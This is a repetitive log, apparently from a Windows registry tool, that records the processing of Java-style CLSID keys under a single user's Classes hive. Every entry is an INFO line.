[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0061-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0061-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0062-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0062-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0062-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0064-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0064-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0064-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0065-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0065-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0065-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0066-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0066-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0066-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0067-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0067-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0067-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0068-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0068-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0068-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0069-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0069-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0069-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0070-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0070-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0070-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0071-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0071-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0071-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0072-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0072-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0072-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0073-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0073-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0073-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0074-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0074-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0074-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0075-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0075-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0075-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0076-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0076-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0076-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0077-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0077-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0077-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0078-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0078-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0078-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0079-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0079-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0079-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0080-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0080-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0080-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0081-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0081-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0081-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0082-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0082-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0082-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0083-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0083-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0083-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0084-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0084-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0084-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0085-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0085-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0085-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-FFFF-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0001-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0001-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0001-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0002-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0002-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0002-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0003-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0003-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0003-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0004-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0004-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0004-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0005-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0005-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0005-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0006-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0006-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0006-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0007-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0007-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0007-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0008-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0008-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0008-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0009-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0009-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0009-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0010-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0010-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0010-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0011-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0011-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0011-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0012-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0012-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0012-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0013-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0013-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0013-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0014-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0014-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0014-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0015-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0015-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0015-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0016-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0016-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0016-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0017-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0017-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0017-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0018-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0018-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0018-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0019-ABCDEFFEDCBA}]
